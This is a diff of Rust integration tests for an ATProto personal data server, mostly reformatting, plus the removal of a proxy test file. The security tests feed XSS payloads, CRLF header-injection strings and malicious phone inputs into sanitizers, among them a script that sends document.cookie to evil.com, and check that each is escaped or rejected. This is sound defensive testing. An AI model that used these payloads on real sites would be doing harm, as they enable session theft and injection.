get_plc_token_from_db(&did) 860 + .await 819 861 .expect("PLC token not found"); 820 862 let mock_server = MockServer::start().await; 821 863 let did_encoded = urlencoding::encode(&did); ··· 892 934 std::env::remove_var("SKIP_IMPORT_VERIFICATION"); 893 935 } 894 936 let import_res = client 895 - .post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await)) 937 + .post(format!( 938 + "{}/xrpc/com.atproto.repo.importRepo", 939 + base_url().await 940 + )) 896 941 .bearer_auth(&token) 897 942 .header("Content-Type", "application/vnd.ipld.car") 898 943 .body(car_bytes.to_vec()) ··· 921 966 .expect("List failed"); 922 967 assert_eq!(list_res.status(), StatusCode::OK); 923 968 let list_body: Value = list_res.json().await.unwrap(); 924 - let records = list_body["records"].as_array() 969 + let records = list_body["records"] 970 + .as_array() 925 971 .expect("Should have records array"); 926 972 assert!( 927 973 records.len() >= 1,
+29 -15
tests/plc_operations.rs
··· 219 219 .expect("Query failed"); 220 220 assert!(row.is_some(), "PLC token should be created in database"); 221 221 let row = row.unwrap(); 222 - assert!(row.token.len() == 11, "Token should be in format xxxxx-xxxxx"); 222 + assert!( 223 + row.token.len() == 11, 224 + "Token should be in format xxxxx-xxxxx" 225 + ); 223 226 assert!(row.token.contains('-'), "Token should contain hyphen"); 224 - assert!(row.expires_at > chrono::Utc::now(), "Token should not be expired"); 227 + assert!( 228 + row.expires_at > chrono::Utc::now(), 229 + "Token should not be expired" 230 + ); 225 231 } 226 232 227 233 #[tokio::test] ··· 294 300 async fn test_submit_plc_operation_wrong_verification_method() { 295 301 let client = client(); 296 302 let (token, did) = create_account_and_login(&client).await; 297 - let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| { 298 - format!("127.0.0.1:{}", app_port()) 299 - }); 303 + let hostname = 304 + std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| format!("127.0.0.1:{}", app_port())); 300 305 let handle = did.split(':').last().unwrap_or("user"); 301 306 let res = client 302 307 .post(format!( ··· 327 332 let body: serde_json::Value = res.json().await.unwrap(); 328 333 assert_eq!(body["error"], "InvalidRequest"); 329 334 assert!( 330 - body["message"].as_str().unwrap_or("").contains("signing key") || 331 - body["message"].as_str().unwrap_or("").contains("rotation"), 335 + body["message"] 336 + .as_str() 337 + .unwrap_or("") 338 + .contains("signing key") 339 + || body["message"].as_str().unwrap_or("").contains("rotation"), 332 340 "Error should mention key mismatch: {:?}", 333 341 body 334 342 ); ··· 338 346 async fn test_submit_plc_operation_wrong_handle() { 339 347 let client = client(); 340 348 let (token, _did) = create_account_and_login(&client).await; 341 - let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| { 342 - format!("127.0.0.1:{}", app_port()) 343 - }); 349 + let hostname = 350 + std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| format!("127.0.0.1:{}", app_port())); 344 351 let res = client 345 352 .post(format!( 346 353 "{}/xrpc/com.atproto.identity.submitPlcOperation", ··· 375 382 async fn test_submit_plc_operation_wrong_service_type() { 376 383 let client = client(); 377 384 let (token, _did) = create_account_and_login(&client).await; 378 - let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| { 379 - format!("127.0.0.1:{}", app_port()) 380 - }); 385 + let hostname = 386 + std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| format!("127.0.0.1:{}", app_port())); 381 387 let res = client 382 388 .post(format!( 383 389 "{}/xrpc/com.atproto.identity.submitPlcOperation", ··· 439 445 let now = chrono::Utc::now(); 440 446 let expires = row.expires_at; 441 447 let diff = expires - now; 442 - assert!(diff.num_minutes() >= 9, "Token should expire in ~10 minutes, got {} minutes", diff.num_minutes()); 443 - assert!(diff.num_minutes() <= 11, "Token should expire in ~10 minutes, got {} minutes", diff.num_minutes()); 448 + assert!( 449 + diff.num_minutes() >= 9, 450 + "Token should expire in ~10 minutes, got {} minutes", 451 + diff.num_minutes() 452 + ); 453 + assert!( 454 + diff.num_minutes() <= 11, 455 + "Token should expire in ~10 minutes, got {} minutes", 456 + diff.num_minutes() 457 + ); 444 458 }
+28 -12
tests/plc_validation.rs
··· 1 1 use bspds::plc::{ 2 - PlcError, PlcOperation, PlcService, PlcValidationContext, 3 - cid_for_cbor, sign_operation, signing_key_to_did_key, 4 - validate_plc_operation, validate_plc_operation_for_submission, 2 + PlcError, PlcOperation, PlcService, PlcValidationContext, cid_for_cbor, sign_operation, 3 + signing_key_to_did_key, validate_plc_operation, validate_plc_operation_for_submission, 5 4 verify_operation_signature, 6 5 }; 7 6 use k256::ecdsa::SigningKey; ··· 95 94 "sig": "test" 96 95 }); 97 96 let result = validate_plc_operation(&op); 98 - assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("verificationMethods"))); 97 + assert!( 98 + matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("verificationMethods")) 99 + ); 99 100 } 100 101 101 102 #[test] ··· 338 339 let cid1 = cid_for_cbor(&value).unwrap(); 339 340 let cid2 = cid_for_cbor(&value).unwrap(); 340 341 assert_eq!(cid1, cid2, "CID generation should be deterministic"); 341 - assert!(cid1.starts_with("bafyrei"), "CID should start with bafyrei (dag-cbor + sha256)"); 342 + assert!( 343 + cid1.starts_with("bafyrei"), 344 + "CID should start with bafyrei (dag-cbor + sha256)" 345 + ); 342 346 } 343 347 344 348 #[test] ··· 354 358 fn test_signing_key_to_did_key_format() { 355 359 let key = SigningKey::random(&mut rand::thread_rng()); 356 360 let did_key = signing_key_to_did_key(&key); 357 - assert!(did_key.starts_with("did:key:z"), "Should start with did:key:z"); 361 + assert!( 362 + did_key.starts_with("did:key:z"), 363 + "Should start with did:key:z" 364 + ); 358 365 assert!(did_key.len() > 50, "Did key should be reasonably long"); 359 366 } 360 367 ··· 364 371 let key2 = SigningKey::random(&mut rand::thread_rng()); 365 372 let did1 = signing_key_to_did_key(&key1); 366 373 let did2 = signing_key_to_did_key(&key2); 367 - assert_ne!(did1, did2, "Different keys should produce different did:keys"); 374 + assert_ne!( 375 + did1, did2, 376 + "Different keys should produce different did:keys" 377 + ); 368 378 } 369 379 370 380 #[test] ··· 414 424 expected_pds_endpoint: "https://pds.example.com".to_string(), 415 425 }; 416 426 let result = validate_plc_operation_for_submission(&op, &ctx); 417 - assert!(result.is_ok(), "Tombstone should pass submission validation"); 427 + assert!( 428 + result.is_ok(), 429 + "Tombstone should pass submission validation" 430 + ); 418 431 } 419 432 420 433 #[test] ··· 447 460 #[test] 448 461 fn test_plc_operation_struct() { 449 462 let mut services = HashMap::new(); 450 - services.insert("atproto_pds".to_string(), PlcService { 451 - service_type: "AtprotoPersonalDataServer".to_string(), 452 - endpoint: "https://pds.example.com".to_string(), 453 - }); 463 + services.insert( 464 + "atproto_pds".to_string(), 465 + PlcService { 466 + service_type: "AtprotoPersonalDataServer".to_string(), 467 + endpoint: "https://pds.example.com".to_string(), 468 + }, 469 + ); 454 470 let mut verification_methods = HashMap::new(); 455 471 verification_methods.insert("atproto".to_string(), "did:key:zTest123".to_string()); 456 472 let op = PlcOperation {
-141
tests/proxy.rs
··· 1 - mod common; 2 - use axum::{Router, extract::Request, http::StatusCode, routing::any}; 3 - use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD}; 4 - use reqwest::Client; 5 - use std::sync::Arc; 6 - use tokio::net::TcpListener; 7 - 8 - async fn spawn_mock_upstream() -> ( 9 - String, 10 - tokio::sync::mpsc::Receiver<(String, String, Option<String>)>, 11 - ) { 12 - let (tx, rx) = tokio::sync::mpsc::channel(10); 13 - let tx = Arc::new(tx); 14 - let app = Router::new().fallback(any(move |req: Request| { 15 - let tx = tx.clone(); 16 - async move { 17 - let method = req.method().to_string(); 18 - let uri = req.uri().to_string(); 19 - let auth = req 20 - .headers() 21 - .get("Authorization") 22 - .and_then(|h| h.to_str().ok()) 23 - .map(|s| s.to_string()); 24 - let _ = tx.send((method, uri, auth)).await; 25 - (StatusCode::OK, "Mock Response") 26 - } 27 - })); 28 - let listener = TcpListener::bind("127.0.0.1:0").await.unwrap(); 29 - let addr = listener.local_addr().unwrap(); 30 - tokio::spawn(async move { 31 - axum::serve(listener, app).await.unwrap(); 32 - }); 33 - (format!("http://{}", addr), rx) 34 - } 35 - 36 - #[tokio::test] 37 - async fn test_proxy_via_header() { 38 - let app_url = common::base_url().await; 39 - let (upstream_url, mut rx) = spawn_mock_upstream().await; 40 - let client = Client::new(); 41 - let res = client 42 - .get(format!("{}/xrpc/com.example.test", app_url)) 43 - .header("atproto-proxy", &upstream_url) 44 - .header("Authorization", "Bearer test-token") 45 - .send() 46 - .await 47 - .unwrap(); 48 - assert_eq!(res.status(), StatusCode::OK); 49 - let (method, uri, auth) = rx.recv().await.expect("Upstream should receive request"); 50 - assert_eq!(method, "GET"); 51 - assert_eq!(uri, "/xrpc/com.example.test"); 52 - assert_eq!(auth, Some("Bearer test-token".to_string())); 53 - } 54 - 55 - #[tokio::test] 56 - async fn test_proxy_auth_signing() { 57 - let app_url = common::base_url().await; 58 - let (upstream_url, mut rx) = spawn_mock_upstream().await; 59 - let client = Client::new(); 60 - let (access_jwt, did) = common::create_account_and_login(&client).await; 61 - let res = client 62 - .get(format!("{}/xrpc/com.example.signed", app_url)) 63 - .header("atproto-proxy", &upstream_url) 64 - .header("Authorization", format!("Bearer {}", access_jwt)) 65 - .send() 66 - .await 67 - .unwrap(); 68 - assert_eq!(res.status(), StatusCode::OK); 69 - let (method, uri, auth) = rx.recv().await.expect("Upstream receive"); 70 - assert_eq!(method, "GET"); 71 - assert_eq!(uri, "/xrpc/com.example.signed"); 72 - let received_token = auth.expect("No auth header").replace("Bearer ", ""); 73 - assert_ne!(received_token, access_jwt, "Token should be replaced"); 74 - let parts: Vec<&str> = received_token.split('.').collect(); 75 - assert_eq!(parts.len(), 3); 76 - let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).expect("payload b64"); 77 - let claims: serde_json::Value = serde_json::from_slice(&payload_bytes).expect("payload json"); 78 - assert_eq!(claims["iss"], did); 79 - assert_eq!(claims["sub"], did); 80 - assert_eq!(claims["aud"], upstream_url); 81 - assert_eq!(claims["lxm"], "com.example.signed"); 82 - } 83 - 84 - #[tokio::test] 85 - async fn test_proxy_post_with_body() { 86 - let app_url = common::base_url().await; 87 - let (upstream_url, mut rx) = spawn_mock_upstream().await; 88 - let client = Client::new(); 89 - let payload = serde_json::json!({ 90 - "text": "Hello from proxy test", 91 - "createdAt": "2024-01-01T00:00:00Z" 92 - }); 93 - let res = client 94 - .post(format!("{}/xrpc/com.example.postMethod", app_url)) 95 - .header("atproto-proxy", &upstream_url) 96 - .header("Authorization", "Bearer test-token") 97 - .json(&payload) 98 - .send() 99 - .await 100 - .unwrap(); 101 - assert_eq!(res.status(), StatusCode::OK); 102 - let (method, uri, auth) = rx.recv().await.expect("Upstream should receive request"); 103 - assert_eq!(method, "POST"); 104 - assert_eq!(uri, "/xrpc/com.example.postMethod"); 105 - assert_eq!(auth, Some("Bearer test-token".to_string())); 106 - } 107 - 108 - #[tokio::test] 109 - async fn test_proxy_with_query_params() { 110 - let app_url = common::base_url().await; 111 - let (upstream_url, mut rx) = spawn_mock_upstream().await; 112 - let client = Client::new(); 113 - let res = client 114 - .get(format!( 115 - "{}/xrpc/com.example.query?repo=did:plc:test&collection=app.bsky.feed.post&limit=50", 116 - app_url 117 - )) 118 - .header("atproto-proxy", &upstream_url) 119 - .header("Authorization", "Bearer test-token") 120 - .send() 121 - .await 122 - .unwrap(); 123 - assert_eq!(res.status(), StatusCode::OK); 124 - let (method, uri, _auth) = rx.recv().await.expect("Upstream should receive request"); 125 - assert_eq!(method, "GET"); 126 - assert!( 127 - uri.contains("repo=did") || uri.contains("repo=did%3Aplc%3Atest"), 128 - "URI should contain repo param, got: {}", 129 - uri 130 - ); 131 - assert!( 132 - uri.contains("collection=app.bsky.feed.post") || uri.contains("collection=app.bsky"), 133 - "URI should contain collection param, got: {}", 134 - uri 135 - ); 136 - assert!( 137 - uri.contains("limit=50"), 138 - "URI should contain limit param, got: {}", 139 - uri 140 - ); 141 - }
+1 -4
tests/rate_limit.rs
··· 85 85 #[ignore = "rate limiting is disabled in test environment"] 86 86 async fn test_account_creation_rate_limiting() { 87 87 let client = client(); 88 - let url = format!( 89 - "{}/xrpc/com.atproto.server.createAccount", 90 - base_url().await 91 - ); 88 + let url = format!("{}/xrpc/com.atproto.server.createAccount", base_url().await); 92 89 let mut rate_limited_count = 0; 93 90 let mut other_count = 0; 94 91 for i in 0..15 {
+27 -9
tests/record_validation.rs
··· 1 - use bspds::validation::{RecordValidator, ValidationError, ValidationStatus, validate_record_key, validate_collection_nsid}; 1 + use bspds::validation::{ 2 + RecordValidator, ValidationError, ValidationStatus, validate_collection_nsid, 3 + validate_record_key, 4 + }; 2 5 use serde_json::json; 3 6 4 7 fn now() -> String { ··· 128 131 "tags": [long_tag] 129 132 }); 130 133 let result = validator.validate(&post, "app.bsky.feed.post"); 131 - assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.starts_with("tags/"))); 134 + assert!( 135 + matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.starts_with("tags/")) 136 + ); 132 137 } 133 138 134 139 #[test] ··· 162 167 "displayName": long_name 163 168 }); 164 169 let result = validator.validate(&profile, "app.bsky.actor.profile"); 165 - assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName")); 170 + assert!( 171 + matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName") 172 + ); 166 173 } 167 174 168 175 #[test] ··· 174 181 "description": long_desc 175 182 }); 176 183 let result = validator.validate(&profile, "app.bsky.actor.profile"); 177 - assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "description")); 184 + assert!( 185 + matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "description") 186 + ); 178 187 } 179 188 180 189 #[test] ··· 229 238 "createdAt": now() 230 239 }); 231 240 let result = validator.validate(&like, "app.bsky.feed.like"); 232 - assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.contains("uri"))); 241 + assert!( 242 + matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.contains("uri")) 243 + ); 233 244 } 234 245 235 246 #[test] ··· 381 392 "createdAt": now() 382 393 }); 383 394 let result = validator.validate(&generator, "app.bsky.feed.generator"); 384 - assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName")); 395 + assert!( 396 + matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName") 397 + ); 385 398 } 386 399 387 400 #[test] ··· 415 428 "createdAt": now() 416 429 }); 417 430 let result = validator.validate(&record, "app.bsky.feed.post"); 418 - assert!(matches!(result, Err(ValidationError::TypeMismatch { expected, actual }) 419 - if expected == "app.bsky.feed.post" && actual == "app.bsky.feed.like")); 431 + assert!( 432 + matches!(result, Err(ValidationError::TypeMismatch { expected, actual }) 433 + if expected == "app.bsky.feed.post" && actual == "app.bsky.feed.like") 434 + ); 420 435 } 421 436 422 437 #[test] ··· 470 485 "createdAt": "2024/01/15" 471 486 }); 472 487 let result = validator.validate(&post, "app.bsky.feed.post"); 473 - assert!(matches!(result, Err(ValidationError::InvalidDatetime { .. }))); 488 + assert!(matches!( 489 + result, 490 + Err(ValidationError::InvalidDatetime { .. }) 491 + )); 474 492 } 475 493 476 494 #[test]
+1 -1
tests/repo_batch.rs
··· 1 1 mod common; 2 - use common::*; 3 2 use chrono::Utc; 3 + use common::*; 4 4 use reqwest::StatusCode; 5 5 use serde_json::{Value, json}; 6 6
+185 -45
tests/security_fixes.rs
··· 1 1 mod common; 2 - use bspds::notifications::{ 3 - SendError, is_valid_phone_number, sanitize_header_value, 4 - }; 5 - use bspds::oauth::templates::{login_page, error_page, success_page}; 6 - use bspds::image::{ImageProcessor, ImageError}; 2 + use bspds::image::{ImageError, ImageProcessor}; 3 + use bspds::notifications::{SendError, is_valid_phone_number, sanitize_header_value}; 4 + use bspds::oauth::templates::{error_page, login_page, success_page}; 7 5 8 6 #[test] 9 7 fn test_sanitize_header_value_removes_crlf() { ··· 11 9 let sanitized = sanitize_header_value(malicious); 12 10 assert!(!sanitized.contains('\r'), "CR should be removed"); 13 11 assert!(!sanitized.contains('\n'), "LF should be removed"); 14 - assert!(sanitized.contains("Injected"), "Original content should be preserved"); 15 - assert!(sanitized.contains("Bcc:"), "Text after newline should be on same line (no header injection)"); 12 + assert!( 13 + sanitized.contains("Injected"), 14 + "Original content should be preserved" 15 + ); 16 + assert!( 17 + sanitized.contains("Bcc:"), 18 + "Text after newline should be on same line (no header injection)" 19 + ); 16 20 } 17 21 18 22 #[test] ··· 35 39 let sanitized = sanitize_header_value(input); 36 40 assert!(!sanitized.contains('\r'), "CR should be removed"); 37 41 assert!(!sanitized.contains('\n'), "LF should be removed"); 38 - assert!(sanitized.contains("Line1"), "Content before newlines preserved"); 39 - assert!(sanitized.contains("Line4"), "Content after newlines preserved"); 42 + assert!( 43 + sanitized.contains("Line1"), 44 + "Content before newlines preserved" 45 + ); 46 + assert!( 47 + sanitized.contains("Line4"), 48 + "Content after newlines preserved" 49 + ); 40 50 } 41 51 42 52 #[test] ··· 45 55 let sanitized = sanitize_header_value(header_injection); 46 56 let lines: Vec<&str> = sanitized.split("\r\n").collect(); 47 57 assert_eq!(lines.len(), 1, "Should be a single line after sanitization"); 48 - assert!(sanitized.contains("Normal Subject"), "Original content preserved"); 49 - assert!(sanitized.contains("Bcc:"), "Content after CRLF preserved as same line text"); 50 - assert!(sanitized.contains("X-Injected:"), "All content on same line"); 58 + assert!( 59 + sanitized.contains("Normal Subject"), 60 + "Original content preserved" 61 + ); 62 + assert!( 63 + sanitized.contains("Bcc:"), 64 + "Content after CRLF preserved as same line text" 65 + ); 66 + assert!( 67 + sanitized.contains("X-Injected:"), 68 + "All content on same line" 69 + ); 51 70 } 52 71 53 72 #[test] ··· 114 133 "+123--help", 115 134 ]; 116 135 for input in malicious_inputs { 117 - assert!(!is_valid_phone_number(input), "Malicious input '{}' should be rejected", input); 136 + assert!( 137 + !is_valid_phone_number(input), 138 + "Malicious input '{}' should be rejected", 139 + input 140 + ); 118 141 } 119 142 } 120 143 ··· 148 171 let malicious_client_id = "<script>alert('xss')</script>"; 149 172 let html = login_page(malicious_client_id, None, None, "test-uri", None, None); 150 173 assert!(!html.contains("<script>"), "Script tags should be escaped"); 151 - assert!(html.contains("&lt;script&gt;"), "HTML entities should be used for escaping"); 174 + assert!( 175 + html.contains("&lt;script&gt;"), 176 + "HTML entities should be used for escaping" 177 + ); 152 178 } 153 179 154 180 #[test] 155 181 fn test_oauth_template_xss_escaping_client_name() { 156 182 let malicious_client_name = "<img src=x onerror=alert('xss')>"; 157 - let html = login_page("client123", Some(malicious_client_name), None, "test-uri", None, None); 183 + let html = login_page( 184 + "client123", 185 + Some(malicious_client_name), 186 + None, 187 + "test-uri", 188 + None, 189 + None, 190 + ); 158 191 assert!(!html.contains("<img "), "IMG tags should be escaped"); 159 - assert!(html.contains("&lt;img"), "IMG tag should be escaped as HTML entity"); 192 + assert!( 193 + html.contains("&lt;img"), 194 + "IMG tag should be escaped as HTML entity" 195 + ); 160 196 } 161 197 162 198 #[test] 163 199 fn test_oauth_template_xss_escaping_scope() { 164 200 let malicious_scope = "\"><script>alert('xss')</script>"; 165 - let html = login_page("client123", None, Some(malicious_scope), "test-uri", None, None); 166 - assert!(!html.contains("<script>"), "Script tags in scope should be escaped"); 201 + let html = login_page( 202 + "client123", 203 + None, 204 + Some(malicious_scope), 205 + "test-uri", 206 + None, 207 + None, 208 + ); 209 + assert!( 210 + !html.contains("<script>"), 211 + "Script tags in scope should be escaped" 212 + ); 167 213 } 168 214 169 215 #[test] 170 216 fn test_oauth_template_xss_escaping_error_message() { 171 217 let malicious_error = "<script>document.location='http://evil.com?c='+document.cookie</script>"; 172 - let html = login_page("client123", None, None, "test-uri", Some(malicious_error), None); 173 - assert!(!html.contains("<script>"), "Script tags in error should be escaped"); 218 + let html = login_page( 219 + "client123", 220 + None, 221 + None, 222 + "test-uri", 223 + Some(malicious_error), 224 + None, 225 + ); 226 + assert!( 227 + !html.contains("<script>"), 228 + "Script tags in error should be escaped" 229 + ); 174 230 } 175 231 176 232 #[test] 177 233 fn test_oauth_template_xss_escaping_login_hint() { 178 234 let malicious_hint = "\" onfocus=\"alert('xss')\" autofocus=\""; 179 - let html = login_page("client123", None, None, "test-uri", None, Some(malicious_hint)); 180 - assert!(!html.contains("onfocus=\"alert"), "Event handlers should be escaped in login hint"); 235 + let html = login_page( 236 + "client123", 237 + None, 238 + None, 239 + "test-uri", 240 + None, 241 + Some(malicious_hint), 242 + ); 243 + assert!( 244 + !html.contains("onfocus=\"alert"), 245 + "Event handlers should be escaped in login hint" 246 + ); 181 247 assert!(html.contains("&quot;"), "Quotes should be escaped"); 182 248 } 183 249 ··· 185 251 fn test_oauth_template_xss_escaping_request_uri() { 186 252 let malicious_uri = "\" onmouseover=\"alert('xss')\""; 187 253 let html = login_page("client123", None, None, malicious_uri, None, None); 188 - assert!(!html.contains("onmouseover=\"alert"), "Event handlers should be escaped in request_uri"); 254 + assert!( 255 + !html.contains("onmouseover=\"alert"), 256 + "Event handlers should be escaped in request_uri" 257 + ); 189 258 } 190 259 191 260 #[test] ··· 193 262 let malicious_error = "<script>steal()</script>"; 194 263 let malicious_desc = "<img src=x onerror=evil()>"; 195 264 let html = error_page(malicious_error, Some(malicious_desc)); 196 - assert!(!html.contains("<script>"), "Script tags should be escaped in error page"); 197 - assert!(!html.contains("<img "), "IMG tags should be escaped in error page"); 265 + assert!( 266 + !html.contains("<script>"), 267 + "Script tags should be escaped in error page" 268 + ); 269 + assert!( 270 + !html.contains("<img "), 271 + "IMG tags should be escaped in error page" 272 + ); 198 273 } 199 274 200 275 #[test] 201 276 fn test_oauth_success_page_xss_escaping() { 202 277 let malicious_name = "<script>steal_session()</script>"; 203 278 let html = success_page(Some(malicious_name)); 204 - assert!(!html.contains("<script>"), "Script tags should be escaped in success page"); 279 + assert!( 280 + !html.contains("<script>"), 281 + "Script tags should be escaped in success page" 282 + ); 205 283 } 206 284 207 285 #[test] 208 286 fn test_oauth_template_no_javascript_urls() { 209 287 let html = login_page("client123", None, None, "test-uri", None, None); 210 - assert!(!html.contains("javascript:"), "Login page should not contain javascript: URLs"); 288 + assert!( 289 + !html.contains("javascript:"), 290 + "Login page should not contain javascript: URLs" 291 + ); 211 292 let error_html = error_page("test_error", None); 212 - assert!(!error_html.contains("javascript:"), "Error page should not contain javascript: URLs"); 293 + assert!( 294 + !error_html.contains("javascript:"), 295 + "Error page should not contain javascript: URLs" 296 + ); 213 297 let success_html = success_page(None); 214 - assert!(!success_html.contains("javascript:"), "Success page should not contain javascript: URLs"); 298 + assert!( 299 + !success_html.contains("javascript:"), 300 + "Success page should not contain javascript: URLs" 301 + ); 215 302 } 216 303 217 304 #[test] 218 305 fn test_oauth_template_form_action_safe() { 219 306 let malicious_uri = "javascript:alert('xss')//"; 220 307 let html = login_page("client123", None, None, malicious_uri, None, None); 221 - assert!(html.contains("action=\"/oauth/authorize\""), "Form action should be fixed URL"); 308 + assert!( 309 + html.contains("action=\"/oauth/authorize\""), 310 + "Form action should be fixed URL" 311 + ); 222 312 } 223 313 224 314 #[test] ··· 235 325 fn test_send_error_timeout_message() { 236 326 let error = SendError::Timeout; 237 327 let msg = format!("{}", error); 238 - assert!(msg.to_lowercase().contains("timeout"), "Timeout error should mention timeout"); 328 + assert!( 329 + msg.to_lowercase().contains("timeout"), 330 + "Timeout error should mention timeout" 331 + ); 239 332 } 240 333 241 334 #[test] 242 335 fn test_send_error_max_retries_includes_detail() { 243 336 let error = SendError::MaxRetriesExceeded("Server returned 503".to_string()); 244 337 let msg = format!("{}", error); 245 - assert!(msg.contains("503") || msg.contains("retries"), "MaxRetriesExceeded should include context"); 338 + assert!( 339 + msg.contains("503") || msg.contains("retries"), 340 + "MaxRetriesExceeded should include context" 341 + ); 246 342 } 247 343 248 344 #[tokio::test] ··· 257 353 .send() 258 354 .await 259 355 .unwrap(); 260 - assert_eq!(res.status(), reqwest::StatusCode::OK, "Session JWTs should be accepted"); 356 + assert_eq!( 357 + res.status(), 358 + reqwest::StatusCode::OK, 359 + "Session JWTs should be accepted" 360 + ); 261 361 let body: serde_json::Value = res.json().await.unwrap(); 262 362 assert_eq!(body["activated"], true); 263 363 } ··· 281 381 fn test_html_escape_ampersand() { 282 382 let html = login_page("client&test", None, None, "test-uri", None, None); 283 383 assert!(html.contains("&amp;"), "Ampersand should be escaped"); 284 - assert!(!html.contains("client&test"), "Raw ampersand should not appear in output"); 384 + assert!( 385 + !html.contains("client&test"), 386 + "Raw ampersand should not appear in output" 387 + ); 285 388 } 286 389 287 390 #[test] 288 391 fn test_html_escape_quotes() { 289 392 let html = login_page("client\"test'more", None, None, "test-uri", None, None); 290 - assert!(html.contains("&quot;") || html.contains("&#34;"), "Double quotes should be escaped"); 291 - assert!(html.contains("&#39;") || html.contains("&apos;"), "Single quotes should be escaped"); 393 + assert!( 394 + html.contains("&quot;") || html.contains("&#34;"), 395 + "Double quotes should be escaped" 396 + ); 397 + assert!( 398 + html.contains("&#39;") || html.contains("&apos;"), 399 + "Single quotes should be escaped" 400 + ); 292 401 } 293 402 294 403 #[test] ··· 296 405 let html = login_page("client<test>more", None, None, "test-uri", None, None); 297 406 assert!(html.contains("&lt;"), "Less than should be escaped"); 298 407 assert!(html.contains("&gt;"), "Greater than should be escaped"); 299 - assert!(!html.contains("<test>"), "Raw angle brackets should not appear"); 408 + assert!( 409 + !html.contains("<test>"), 410 + "Raw angle brackets should not appear" 411 + ); 300 412 } 301 413 302 414 #[test] 303 415 fn test_oauth_template_preserves_safe_content() { 304 - let html = login_page("my-safe-client", Some("My Safe App"), Some("read write"), "valid-uri", None, Some("user@example.com")); 305 - assert!(html.contains("my-safe-client") || html.contains("My Safe App"), "Safe content should be preserved"); 306 - assert!(html.contains("read write") || html.contains("read"), "Scope should be preserved"); 307 - assert!(html.contains("user@example.com"), "Login hint should be preserved"); 416 + let html = login_page( 417 + "my-safe-client", 418 + Some("My Safe App"), 419 + Some("read write"), 420 + "valid-uri", 421 + None, 422 + Some("user@example.com"), 423 + ); 424 + assert!( 425 + html.contains("my-safe-client") || html.contains("My Safe App"), 426 + "Safe content should be preserved" 427 + ); 428 + assert!( 429 + html.contains("read write") || html.contains("read"), 430 + "Scope should be preserved" 431 + ); 432 + assert!( 433 + html.contains("user@example.com"), 434 + "Login hint should be preserved" 435 + ); 308 436 } 309 437 310 438 #[test] 311 439 fn test_csrf_like_input_value_protection() { 312 440 let malicious = "\" onclick=\"alert('csrf')"; 313 441 let html = login_page("client", None, None, malicious, None, None); 314 - assert!(!html.contains("onclick=\"alert"), "Event handlers should not be executable"); 442 + assert!( 443 + !html.contains("onclick=\"alert"), 444 + "Event handlers should not be executable" 445 + ); 315 446 } 316 447 317 448 #[test] 318 449 fn test_unicode_handling_in_templates() { 319 450 let unicode_client = "客户端 クライアント"; 320 451 let html = login_page(unicode_client, None, None, "test-uri", None, None); 321 - assert!(html.contains("客户端") || html.contains("&#"), "Unicode should be preserved or encoded"); 452 + assert!( 453 + html.contains("客户端") || html.contains("&#"), 454 + "Unicode should be preserved or encoded" 455 + ); 322 456 } 323 457 324 458 #[test] 325 459 fn test_null_byte_in_input() { 326 460 let with_null = "client\0id"; 327 461 let sanitized = sanitize_header_value(with_null); 328 - assert!(sanitized.contains("client"), "Content before null should be preserved"); 462 + assert!( 463 + sanitized.contains("client"), 464 + "Content before null should be preserved" 465 + ); 329 466 } 330 467 331 468 #[test] 332 469 fn test_very_long_input_handling() { 333 470 let long_input = "x".repeat(10000); 334 471 let sanitized = sanitize_header_value(&long_input); 335 - assert!(!sanitized.is_empty(), "Long input should still produce output"); 472 + assert!( 473 + !sanitized.is_empty(), 474 + "Long input should still produce output" 475 + ); 336 476 }
+4 -1
tests/server.rs
··· 244 244 async fn test_get_service_auth_with_lxm() { 245 245 let client = client(); 246 246 let (access_jwt, did) = create_account_and_login(&client).await; 247 - let params = [("aud", "did:web:example.com"), ("lxm", "com.atproto.repo.getRecord")]; 247 + let params = [ 248 + ("aud", "did:web:example.com"), 249 + ("lxm", "com.atproto.repo.getRecord"), 250 + ]; 248 251 let res = client 249 252 .get(format!( 250 253 "{}/xrpc/com.atproto.server.getServiceAuth",
+22 -14
tests/signing_key.rs
··· 1 1 mod common; 2 2 mod helpers; 3 + use helpers::verify_new_account; 3 4 use reqwest::StatusCode; 4 - use serde_json::{json, Value}; 5 + use serde_json::{Value, json}; 5 6 use sqlx::PgPool; 6 - use helpers::verify_new_account; 7 7 8 8 async fn get_pool() -> PgPool { 9 9 let conn_str = common::get_db_connection_string().await; ··· 91 91 .fetch_one(&pool) 92 92 .await 93 93 .expect("Reserved key not found in database"); 94 - assert_eq!(row.private_key_bytes.len(), 32, "Private key should be 32 bytes for secp256k1"); 95 - assert!(row.used_at.is_none(), "Reserved key should not be marked as used yet"); 96 - assert!(row.expires_at > chrono::Utc::now(), "Key should expire in the future"); 94 + assert_eq!( 95 + row.private_key_bytes.len(), 96 + 32, 97 + "Private key should be 32 bytes for secp256k1" 98 + ); 99 + assert!( 100 + row.used_at.is_none(), 101 + "Reserved key should not be marked as used yet" 102 + ); 103 + assert!( 104 + row.expires_at > chrono::Utc::now(), 105 + "Key should expire in the future" 106 + ); 97 107 } 98 108 99 109 #[tokio::test] ··· 272 282 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 273 283 let body: Value = res.json().await.unwrap(); 274 284 assert_eq!(body["error"], "InvalidSigningKey"); 275 - assert!(body["message"] 276 - .as_str() 277 - .unwrap() 278 - .contains("already used")); 285 + 